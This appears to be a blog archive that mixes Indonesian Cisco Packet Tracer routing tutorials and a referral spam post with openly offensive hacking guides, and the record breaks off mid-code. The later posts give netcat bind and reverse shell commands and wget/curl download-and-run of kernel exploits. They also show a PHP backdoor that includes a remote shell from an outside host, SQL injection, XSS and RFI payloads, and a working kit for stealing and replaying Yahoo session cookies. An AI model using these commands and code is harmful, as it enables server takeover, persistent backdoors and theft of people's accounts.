Tuesday, June 12, 2012

Konfigurasi Router RIP

Kali ini saya akan membagi kalian tentang cara atau bagaimana mengkonfigurasi router dengan menggunakan RIP. Sebelum kita konfigurasi sebaiknya kita lihat desain yang mau di konfigurasi kalau saya ini yang mau di konfigurasi.


Oke ini desain yang akan saya konfigurasi, tanda titik merah adalah untuk mengetahui bahwa itu belum pernah di konfigurasi. Langsung aja deh kayaknya udah gak pada sabar.. hehehe

Pertama tentuin dulu ip address pada masing-masing kabel. misal saya ngambil contoh :

Router0 ke Router1 : 10.0.0.0/8
Router1 ke Router2 : 40.0.0.0/8
Router2 ke Router3 : 30.0.0.0/8
Router3 ke Router0 : 20.0.0.0/8

Router0 ke pc : 192.168.0.0/24
Router1 ke pc : 130.130.0.0/16
Router2 ke pc : 50.0.0.0/8
Router3 ke pc : 200.200.200.0/24

Setelah kita menentukan IP address barulah kita masuk tahap konfigurasi. berikut konfigurasinya :

Untuk Router0

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 10.10.10.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 20.20.20.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 192.168.0.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

Untuk Router1

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 10.10.10.2 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 40.40.40.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 130.130.130.1 255.255.0.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

Untuk Router2

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 40.40.40.2 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 30.30.30.2 255.0.0.0
Router(config-if)#no shutdown
Router(config-if)#clock rate 9600
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 50.50.50.1 255.0.0.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

Untuk Router3

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 20.20.20.2 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 30.30.30.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 200.200.200.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

Tahap memasukan ip pada routernya selesai kemudian masuk ke tahap Routing RIP berikut penjelasannya :

Untuk Router0

Router(config)#router rip
Router(config-router)#network 10.0.0.0
Router(config-router)#network 20.0.0.0
Router(config-router)#network 192.168.0.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#

Untuk Router1

Router(config)#router rip
Router(config-router)#network 10.0.0.0
Router(config-router)#network 40.0.0.0
Router(config-router)#network 130.130.0.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#

Untuk Router2

Router(config)#router rip
Router(config-router)#network 30.0.0.0
Router(config-router)#network 40.0.0.0
Router(config-router)#network 50.0.0.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#

Untuk Router3

Router(config)#router rip
Router(config-router)#network 20.0.0.0
Router(config-router)#network 30.0.0.0
Router(config-router)#network 200.200.200.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#

Oke jika tahap diatas sudah dilalui dengan benar, tinggal mengetestnya saja pada ping di komputer clientnya. masukan IP address sesuai dengan line pada routernya. misal :

PC0 : 200.200.200.2/24 gateway 200.200.200.1
PC1 : 192.168.0.2/24 gateway 192.168.0.1
PC2 : 50.50.50.2/8 gateway 50.50.50.1
PC3 : 130.130.130.2/16 gateway 130.130.130.1

Jika pada ping menunjukan seperti ini :

Pinging 50.50.50.2 with 32 bytes of data:

Reply from 50.50.50.2: bytes=32 time=20ms TTL=125
Reply from 50.50.50.2: bytes=32 time=9ms TTL=125
Reply from 50.50.50.2: bytes=32 time=22ms TTL=125
Reply from 50.50.50.2: bytes=32 time=11ms TTL=125

Ping statistics for 50.50.50.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 9ms, Maximum = 22ms, Average = 15ms

Maka konfigurasi yang anda lakukan berhasil... Sekain posting kali ini semoga bermanfaat bagi pembaca.. See you next posting - http://tkjonline.net

Friday, May 18, 2012

Konfigurasi Peer to Peer


Oke Sekarang gua mau kasih cara konfigurasi peer to peer antara dua pletop...

Langsung aja :
1.       Bukalah program cisco packet tracer 5.3.2 yang sudah anda install
2.       Buatlah sebuah design jaringan seperti berikut ini

Gambar 1 : Peer to Peer System

3.       Hal ini kita pakai jika kita missal ingin mengopy data teman yang besar atau sebuah film missal, daripada menggunakan flashdisk, sangat disarankan untuk menggunakan kabel cross…pembuatan kabel cross saya rasa bagi teman-teman sudah tidak ada masalah…
4.       Tahap selanjutnya adalah memberikan IP ADDRESS dan COMPUTER NAME…
5.       Untuk IP Address laptop 1, klik aja 2x pada laptop 1, dan akan muncul  tampilan berikut ini…

Gambar 2 : Tampilan Kotak Dialog Properties untuk Laptop 1

6.       Pada tahap ini yang bisa kita lakukan adalah memberikan display name, perhatikan pada gambar diatas yang diberi kotak merah…gantilah nama simulasi anda sesuai dengan yang diatas…


7.       Tahap berikutnya untuk memberikan IP Address, perhatikan langkah berikut ini…

Gambar 3 : Desktop

8.       Tahap disini kita akan memberikan IP Address…klik tab desktop diatas dan klik pilihan IP Configuration


Gambar 4 : IP Configuration

9.       Settinglah dan Rubahlah ip address dan subnet mask seperti gambar diatas…
10.   Untuk basis /24 itu berarti subnet mask yang diberikan adalah 255.255.255.0
11.   Untuk subnetting akan coba saya jelaskan menyusul…
12.   Jika sudah, langsung aja disclose dan beralih pada laptop 2, lakukan hal yang sama pada
13.   Jika sudah lakukan pengetesan dengan mengirimkan data dengan cara PING ataupun PDU jika reply atau successfully berarti konfigurasi berhasil.

Nah sekian sampai sini dulu ya,, See you next time...

Praktikum Jaringan Komputer

Sekian lama tidak posting gua mau posting tapi bingung mau posting apaan ya?? nah kemudian suatu ide muncul dalam benak gua kenapa gak posting tentang tutorial packet tracer.


Nah, langsung aja dah, pengertian jaringan computer sendiri adalah Menghubungkan 2 Komputer atau lebih  untuk saling berkomunikasi dan berbagi dengan menggunakan File atau Sumber dayaMenghubungkan 2 Komputer atau lebih  untuk saling berkomunikasi dan berbagi dengan menggunakan File atau Sumber daya.

Media Transmisi yang kita gunakan sementara ini masih berupa kabel, terutama untuk kabel UTP dengan Konektor RG45. Nah, permasalahannya adalah, ketika kita ingin mempraktekkannya, kita harus menggunakan computer. Iya kan. Tapi sekarang jamannya dah g kayak dulu lagi, ada yang namanya simulasi, jadi kita g perlu beli hub untuk menghubungkan banyak computer, dan kita tidak perlu beli router untuk menghubungkan 1 jaringan dengan jaringan yang laen yang berbeda kelas missal.

Program itu namanya Packet Tracer…versi terbarunya bisa didownload disini…
Kurang lebih kayak gini..


Kalo gak salah sih ini bisa mencakup seluruh pelajaran network yang ada diperkuliahan jadi klo lu udah pada advance dengan software simulasi yang satu ini soo,, gak usaha cape" kuliah tapi klo lu mau ngambil sertifikat s1 yang lu kuliah dah. semua tergantung kepada diri kau masing" haha...

sekian gua kira cukup perkenalan tentang packet tracer next time gua akan posting yang lebih mantep lagi.. 
see you...

Monday, December 19, 2011

Free Reward from Silent Reward

2FTwu


Silent Rewards is the first true private rewards network ever launched. We have our own unique system that gives our members more exclusive benefits and incentives for completing offers. Our network is like no other; by featuring daily giveaways, raffles, and extraordinary contests, we are able to provide you with an experience that no other reward site can match. On top of this, we ensure top notch support through having an invitation-only community. Only those with an invite code can gain access into our network. If you are serious about making income online, Silent Rewards is for you. Do you think you have what it takes to be in our network? Get a referral code and let’s see.

Wanna Register? There's few codes:

http://www.silentrewards.com/ - Earn Points redeem anything! =)

Invite Code:
PWES8VVJWR

This website has to be the best site to earn gifts!

Some Gifts you can earn!


jack
demon
amy
alamare
pinkrobba
mike

and those are just some of the rewards you can earn. There are tons more! So go to http://www.silentrewards.com/

img_1

Wednesday, August 24, 2011

Basic Rooting LINUX

[ Gaining Root Access ]
[ The Basics of rooting a server ]

[x] What would I expect from this tutorial?

- This tutorial is to show you the easy ways of gaining root access to a *nix server.
most people think its quiet hard to do so, well I am trying to prove the opposite.

[x] I am interested, go on...

- Okay, you should know atleast some basics of webhacking, to gain access to the server you want to root.
if you have no idea, or never gained access to a server before, I suggest you read some WebHacking tutorials.

I will start with some of the things you need to know in order to start rooting servers::

- Using a shell, have a good background on *nix commands, and know your way around a *nix server.
[ You can learn all that locally, by just installing a *nix distro, and playing around with it. ]
- How to use NetCat, and listen / connect to servers using it.
[ I will cover that in this tutorial ]
- as mentioned earlier, you must have atleast the basics of webhacking covered, how to gain access to a server. etc..
[ Read some WebHacking tutorials, I made a very basic one with alot of examples covering the most used attacking vectors ]

Those are the basic requriements that you should cover before starting reading this tutorial, if you feel you got one missing, lookup some tutorials on it, or you can ask me

[x] How much access you have?

- You cant just root a server if you have a XSS on that server, unless you take that XSS to the extreme and phish with it, but thats another story.
so, we need atleast ability to upload / download / include our code, or even just exeucute it.

Once we got the ability to execute commands on that server, we start checking for things, this is my own checklist that I do on every server. its just a habit now::

Check the /etc/passwd file for the users with SSH access, how do I know which have and which does not?
simple, by using `cat` to get the contents of that file, you will see the users on the server in this form:

user:*:501:502:x:/home/user:/bin/bash
[1] [2] [3]

[1] - The usersname | good for us to know the user to be used on cPanels, FTPs, and SSH...

[2] - Home of that username | good for cross server hacks, where you need to get to that users files.

[3] - Shell access | If it was anything other than :

/bin/sh
/bin/bash
/bin/zsh

Most probably it means no shell / SSH access for that user.

Now, why are we looking for users with SSH access?

Because it would make it much easier to work on that server with SSH access, to execute commands faster etc..

Now lets say the user `user` got SSH access, we can go to his `home` and look for config files, passwords, backups, anything that will have a password.

and then try it on SSH, with the user `user` and the pass that we found, if you are lucky, you will get access

[ Not going to explain what to do next, cause we still need to complete the checklist ]

Allright, so none of the users got SSH access... we cant just give up now can we?

If the hosting company is not that big, or if it was a private server, VPS, dedicated server, most likely the main site of the hosting is on the same server...

that is a great thing to have, so we do a simple WHOIS on the server, and check out the host, and then try to find the home dir...

Now most hosting, will have a billing software, or some system check panels, etc. all of those needs a high user access to the server, so in most cases you will find the password of admin access in plaintext,

we will be looking for config files, how to do so?

well, we moved to the hosts home right, lets check there files...

by listing the files there, we can see they have a folder called `billing`, lets check that out...

the first step, is to get the contents of the index, and look for the included files, most cases its just clear that this file is a config file from the name.

it will be something like:

<?php include('config.php'); ?> or <?php include('connection/db.php'); ?> or <?php include('includes/conf.php'); ?>

by getting the contents of that file, we can get the password, and try it on that user, on SSH, cPanel, FTP.

[ No luck... next... ]

The hosting company has there files on another server, there are no backups whatsoever, and you are getting desprete by now...

NetCat comes to the rescue!, NetCat the TCP/IP swiss army knife should be always in your pocket `flash drive or whatever you use`, it is very usefull..

as I promised, I will explain about the usage of NetCat.. so here we go::

[ Windows ]

After downloading NetCat, open up your CMD, and move to the dir that it is located.

The commands you would need are:

nc -vv -l -p 5555

This will make NetCat listen on port 5555, verbosely `telling you exactly what is going on`. that simple eh?

nc -vv -L -p 5555

Same thing, but with a capital L, makes it listen and once disconnected, listen again, and again.. etc...

nc darkmindz.com 80

Connect to darkmindz.com on port 80.

nc -vv -l -p 5555 -e cmd.exe

Okay, you dont want to do that on your own PC, this would listen on port 5555, and once someone connects, it would open up cmd for them...

[ Thats all you need to know about NetCat for now ]

[ *nix ]

Downloaded NetCat, compiled it, and ready to go...

same commands, now the only difference is, since most webservers are *Nix, you will need to use it as a `backdoor`, by using this command:

./nc -vv -l -p 5555 -e /bin/bash

once connected, you got a bash command line on that server

allright, where does that leaves us.. we still need to get a better way to execute commands on the server, and all our trials to get SSH access failed...

Now we are going to move into, Backconnecting and Backdooring...

[ Backconnecting ]

A simple definition would be:

Making the server connect to you.

Limitations:

If the server was firewalled, or had some kind of security against remote connections, you cant use that method...

How-To:

Well, you can code your own backconnector, it is not that hard, if you know C or Perl. but if you dont, you can always use the lots of backconnectors out there.

The most used tool, `atleast by me`, is the iranian backconnnector, and the cyberlab. both are in perl, and both work like a charm.

ofcourse perl should be installed on that server to be able to use those, if perl is installed, all you need to do is::

use NetCat on your PC to listen to a port...

nc -vv -l -p 5555

then, on that server, follow the instructions of your backconnector, most likely it is::

perl dc.pl your_ip_here 5555

if it connected, you will see it on your screen, saying connected, and you can start executing commands

otherwise, you can try a C backconnect tool.. same concept, just compile and run...

[ Backdooring ]

Backdooring, is opening a port on the server, to connect to...

You can use NetCat in this case, and run the command:

./nc -vv -l -p 5555 -e /bin/bash

then connect to the server using NetCat.. done..

or use some bind shells, wont work on alot of servers, they started banning the process... but if it works, great!

[x] So, we have been talking about how to get more access to execute commands all day now, whats next?!

Right, so backups were not found, host is not on the same server, and if it was, all the passwords are either invalid or encrypted.

Now we move into some kernel exploits, and using the server to the max.

atleast by now, you should have a command line access, SSH, Backconnect, Backdoor, whatever it was...

so now you can easily execute commands on the server, but what would you do exactly?

Now its time to get info on the server, kernel, processes, services, and then look for vulnurabilities.

we always start by the kernel, so get the kernel version by:

uname -a

it would output the hostname, OS, and then the kernel version, now we need to find an exploit for that kernel..

a good website for kernel exploits is: http://melol.free.fr/local/

lets say you found the kernel exploit, now we need to run it, how?

lets move to a dir that no one usually look in it, and that is /tmp/.

now, we are going to download that exploit, we can use wget for that:

wget http://melol.free.fr/local/the_name

if it says /bin/wget access denied, dont worry, we can always cURL:

curl http://melol.free.fr/local/the_name -o new_name

if that doesnt work either, remember your shell? well use it to upload that exploit in /tmp/.

now to run it, we first need to give it execution perms, so we chmod it to 777

chmod 777 new_name

allright, now lets hope this works and run it..

./new_name

you can check if it works by checking your id, or whoami, and if it says root. you are good to go

allright, we covered the basic basics of getting root on a server, rooting is not that hard, some attacking methods are hard, like BoF's, you need C knowledge to be able to debug and exploit the processes...


[x] I dont want to loose the root!!

No one does, but alot makes stupid mistakes that will take the root away from them...

Rule #1 and the most important is : You NEVER change the roots pass, NEVER EVER!

Create a new user, with SSH access. check the useradd command for more info.

If you used a local root exploit, make sure you have other copies of it on that server, you might need it again.

Backdoor every single site on the server, with a simple PHP-Shell backdoor:


PHP Code:
<?php $config_x $_SERVER['HTTP_USER_AGENT']; if($config_x == "myb4ckd00r") { @include('http://www.darkmindz.com/shell/x2300.txt '); } ?>

Use bind shell backdoors too.

Lets Begin with Basic Hacking

Welcome to this tutorial. Please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers, I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this

NOTE: This tutorial has been compiled from a collection of various articles on hacking

Lets start


Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/
-----------------------------------------------------------------------------------
Daemon Vulnerabilities:
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses
-----------------------------------------------------------------------------------
Scanning For Vulnerabilites:
Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time do we? Well nmap has us covered there, so just scan multiple ports by seperating each target port with a comma (,) like so:"nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV"This will scan all ports between 1 and 1000.
[Image: nmap-portscanning-08.JPG]
-----------------------------------------------------------------------------------
Checking For Vulnerability
After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.
-----------------------------------------------------------------------------------
Using the Exploits
This varies, depending on the language that the exploit is coded in. You can google it.you can also use Metasploit..Various exploits repository are available online like the exploit-db, inject0r.So exploits can be searched there.Later I will also share a tutorial on using metasploit
-----------------------------------------------------------------------------------
NOTE: Exploits can be coded in any language.So you need a good control over programming languages. So to develop exploit we must have a good knowledge of programming languages like the C++, perl, python etc. I would recommend learning C/C++ and python bcoz I have seen most exploit coded in them and they are easy to learn also
ommon Web-Script Vulnerabilities

-----------------------------------------------------------------------------------

Common Web-Script Vulnerabilities

Here, I will be writing about vulnerabilities in a web server's server-sided code. Here are the topics I will be covering:
* SQL Injection
* XSS (Cross-Site Scripting)
* RFI/LFI (Remote/Local File Include)

__________________________________________________ _
SQL Injection: SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code
PHP Code:

PHP Code:
<?php
$user 
$_POST['u'];$pass $_POST['p'];

if (!isset(
$user) || !isset($pass)) {
echo(
"<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
$sql "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";$ret mysql_query($sql);$ret mysql_fetch_array($ret);
if (
$ret[0] != "") {
echo(
"Welcome, $user.");
} else {
echo(
"Incorrect login details.");
}
}
?>

Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail. You can refer to my tutorial on mysql injection

__________________________________________________ __________________________________________________ _

XSS (Cross-Site Scripting)
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)

Example Vulnerable Code - search.php (PHP)

PHP Code:
<?php
$s 
$_GET['search'];// a real search engine would do some database stuff hereecho("You searched for $s. There were no results found");?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=<script>window.location='http://abc.com/'</script>". This will output "You searched for <script>window.location='http://abc.com./'</script>. There were no results found" (HTML) and assuming the target's browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to the abc.com
--------------------------------------------------------------------------------------------------------------------
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)
PHP Code:
PHP Code:
<?php
$page 
$_GET['p'];
if (isset(
$page)) {
include(
$page);
} else {
include(
"home.php");
}
?>
Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server
PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>

and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
--------------------------------------------------------------------------------------------------------------------
Recommended for all beginners
For all beginners , who didn't have basic knowledge and want to learn, should visit this site and should check the lesson section:
Code:
http://www.hackerhighschool.org/
----------------------------------------------------------------------------------------------------------------
Those who want to move to advance form of hacking must download this book by VINAY bhai named "access denied". Its a wonderful book and requires programming skills:
Code:
http://cid-dca018b0abc58bcb.skydrive.live.com/self.aspx/.Public/Access%20Denied.rar?lc=16393
----------------------------------------------------------------------------------------------------------------
Other books recommended are:
shellcoder's handbook
gray hat hacking (plz google them )
Writing security tools and exploits:
Code:
http://hack0wn.com/filedesc/pdf/Writing%20Security%20Tools%20and%20Exploits.pdf
-------------------------------------------------------------------------------------------------------------
LinuxCBT Security Edition (video tutorial, excellent) 4.7GB
1. Security Basics (fundamentals)
2. Proxy Security feat. Squid
3. Firewall Security feat. IPTables
4. SELinux Security - MAC-based Security Controls
5. Network Intrusion Detection System (NIDS) Security feat. Snort® NIDS
6. Packet | Capture | Analysis Security feat. Ethereal®|WireShark®
7. Pluggable Authentication Modules (PAM) Security
8. Open Secure Shell version 2 (OpenSSHv2) Security
9. OpenPGP with Gnu Privacy Guard (GPG) Security
10. Secure File Transfer Protocol (SFTP) Security
Code:
http://isohunt.com/torrent_details/118749757/linux+cbt+linuxcbt?tab=summary

-------------------------------------------------------------------------------------------------------------

Metasploit is an exploitation framework widely use by hackers, pen testers and security researchers. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well-known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework

Background: Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third-party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
--------------------------------------------------------------------------------------------------------------------
In this tutorial, I will discuss using metasploits, its commands and its advantages. Now we all have come to know that its a famous exploitation framework used widely. So lets start

Installing on windows:- Download the installer from the site and install it

Installing on Linux:- Refer to metasploit Linux support for installation on linux :
http://www.metasploit.com/framework/support/

Lets get familiar with some common terms to be used:

Exploit: It is the way of getting into the system via a vulnerability or bad setup/configuration.


Payload: It is what we want the exploit to do. A kind of configuration for attack

Auxillary: They are other applications which come with metasploit like teh scanners, detectors and the sniffers

Encoders: With a lot of exploits anti viruses pick them up when an attacker tries to execute the victim box. And what the encoders do is somewhat jumble the code so it makes it a hell of a lot harder for anti viruses to detect them. Very handy.

--------------------------------------------------------------------------------------------------------------------
Commands

Various commands are used in metasploit for attacking and exploitation. Like some of them, I m describing
:-

Search: Search is good and is very useful when u dont know the exploit name. U can search for it, for eg. if i don't about a particular exploit for apache server I will find it using search apache

set and setg: Set you would use when your doing a single attack. And Setg means Set Global, so every exploit you test during that session will use the same LHOST & RHOST for eg:

setg LHOST 192.168.1.5
setg RHOST 192.168.1.150


Show: If you type show it will display all the exploits, payloads, auxiliaries it has.

info: What info does is allows you to pull up available information about the exploit .So if you type info exploit it will show you the information metasploit has on it

Hacking Email Yahoo by Stealing Cookies

FOR EDUCATIONAL PURPOSES ONLY!

Please delete if it is repost....thank you!

First of all lets find out the basic of cookies....
What are session cookies or session IDs?
--->Whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page so you don't get asked for the same information you've already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Now lets find out how it works:
Just visit yahoo.com. and copy paste below code to your browser URL and click enter (You would get a pop up box showing the cookies)

Code:
javascript:alert(document.cookie);

Now lets go deeper:
Now login to your account and do same thing above code, you would see and notice some more elements added to the cookies. These represent sessions ids.

So it means sessions are stored in our browser in form of cookies.

An attacker can steal that session by convincing slave to run a piece of code in browser. Attacker can use that stolen session to login into slave's account without providing any username/password. This attack is very uncommon because when the slave clicks 'Sign out', session gets destroyed and attacker too also gets signed out.

But in case of yahoo, it’s not the same. The attacker doesn’t get signed out when slave clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions again for next 24 hrs. This means, once the yahoo account session is stolen, attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Here we go this is what we need:
steps for stealing session cookies:
1. Sign Up for an account at any free web hosting site.
2. Now login to your account and go to file manager. And put this files to www folder
a. Name this code as hacked.php
Code:
<?php
$pass = "scifix";

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD cookiesTML 1.0 Transitional//EN" "http://www.w3.org/TR/cookiestml1/DTD/cookiestml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/cookiestml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title id=xx>scifix</title>
<link rel="stylesheet" href="s.css" />
<script type="text/javascript" src="j.js"></script><style type="text/css">
<!--
body {
    background-color: white;
}
-->
</style>
<style type=text/css>
#xx{font-family:"Times New Roman" size:30px}
</style>

</head>
<body>
<!---

--->
<div id="header" class="header">

    <td align="left">
      <table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
        <tr align="left">
          <td width="50%">&nbsp;</td>
          <td width="50%"> <p align="right"><a href="?"><span class="links"> Refresh | </span></a><a href="?logout=1"><span class="links"> LogOut </span></a>
          </p></td>
        </tr>
      </table>
  </td>
</td>
</div>
<br />
<br />
<br />

<center>
  <font color="black" face="Terminal" size=9 >www.hackforums.net</font>
</center>
<center>
  <font color="blue" size="6" face="Terminal">SCIFIX AT YOUR SERVICE --sharing is learning--</font>
</center>

<br />
<br />
<br />



<div id="wrapper">

  <table cellpadding="0" cellspacing="0" border="0" class="sortable" id="sorter">
    <tr>
      <th width="162"><p><font color="red" >Hacked account (Click to access) </font></p></th>
      <th width="170"><p><font color="red" >Date</font></p></th>
     
      <th width="77"><p><font color="red" >Delete</font></p></th>
  </tr>
  <?php
   if($_GET['logout'] == 1) {
  echo "<script>document.cookie ='pass=; path=/'</script>";
  echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=?\">";
   }

  if(isset($_POST["pass"])) {
echo "<script>document.cookie ='pass=".$_POST['pass']."; path=/'</script>";
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=\">";
                 }
if($_COOKIE['pass'] != $pass) {


        echo '</table></div><div align="center"><b>Enter the password (I hope javascript is on): </b><p><form method="post">' .
             '<input type="password" name="pass"> <input type="submit" name="check" value="Login">' .
             '</form> </div>';
          exit(0);
}



if($_GET['del']) {
        @unlink("./cookies/".$_GET['del']);
                    }

if ($handle = opendir('./cookies/')) {
    while ($file = readdir($handle)) {
        if ($file != "." && $file != ".." && $file != "index.html") {



$fcookie = "./cookies/".$file;
$fh = fopen($fcookie, 'r');
$cookie = fread($fh, filesize($fcookie));

    $T = explode("T=", $cookie); $T = $T[1];
    $T = explode(";", $T); $T = $T[0];

    $Y = explode("Y=", $cookie); $Y = $Y[1];
    $Y = explode(";", $Y); $Y = $Y[0];

    $yid = explode("l=", $Y); $yid = $yid[1];
    $yid = explode("/o", $yid); $yid = $yid[0];

    $str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
    $str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
    $id = ""; for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};

    $p = substr($Y, strpos($Y, "p=") + 2, 7);
   
    $date = date ("M d Y H:i:s", filemtime("./cookies/".$file));

    $lang = explode("lg=", $Y); $lang = $lang[1];
    $lang = explode("&", $lang); $lang = $lang[0];


    $sr = array(array(";", "&", "="), array(null, "%26", "%3D"));
    $y = "Y%3D" . str_replace($sr[0], $sr[1], $Y);
    $t = "T%3D" . str_replace($sr[0], $sr[1], $T);

echo "<tr><td><a  href=\"http://msg.edit.yahoo.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"><b><font color=white size= 5px> ".$id."</font></b></a></td><td>";
echo $date."</td><td>";

echo "<a href=\"?del=".$file."\">Delete it</a></td></tr>";

}
}
    closedir($handle);
}


?>

        </tr>

    </table>
</div>
<script type="text/javascript">
var sorter=new table.sorter("sorter");
sorter.init("sorter",1);
</script>

</body>
</html>

b. Name this code as j.js

 
Code:
var table=function(){
    function sorter(n){
